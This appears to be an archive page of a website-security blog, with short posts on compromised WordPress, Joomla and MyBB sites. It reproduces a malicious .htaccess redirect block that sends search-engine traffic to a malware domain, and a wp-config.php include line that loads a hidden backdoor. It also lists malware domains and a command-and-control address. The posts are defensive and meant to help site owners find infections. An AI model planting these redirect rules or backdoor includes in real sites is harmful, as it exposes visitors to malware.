We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.
For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:
face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru
Sucuri Co-Founder Dre Armeda did a great presentation at WordCamp Chicago about end-user security for WordPress users.
Check out the video here:
Dre will also be speaking at WordCamp Las Vegas 2011, make sure to say hi if you’re attending.
If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches fixing a high priority security issue that will allow remote users to change other users passwords (even on admin account).
More details on the Joomla website and here.
Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.
Read more
Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.
This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.
* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.
This is what gets added to the .htaccess of the compromised sites:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.
Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.
It would be useful to gain metrics based on the amount of sites that were truly affected, the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.
We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.
Read more
It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:
There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.
The MyBB team recommend these actions:
*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.
We constantly see sites hacked due to vulnerabilities in various tools. In most cases, site owners don’t even realize they are there, or don’t even remember they were installed.
For example, a site owner/manager has to make a quick modification in the database and installs phpMyAdmin, a few months (or even years) later their site gets hacked through a vulnerability discovered in phpMyAdmin.
Read more
A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:
ASK Sucuri: What about the backdoors?
However, we still see on online forums people recommending to search for “eval ( base64_decode” and things like that when searching for backdoors. If you review our examples in that article, you can see that it would miss a few of them.
Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:
Read more
We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).
According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages on Google index with a JavaScript malware pointing to it.
What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:
Read more
We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?
It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):
require( ABSPATH . “/../etc/mailquota”);
Having trouble with your #Wordpress blog at #GoDaddy? Sucuri.net can help you.
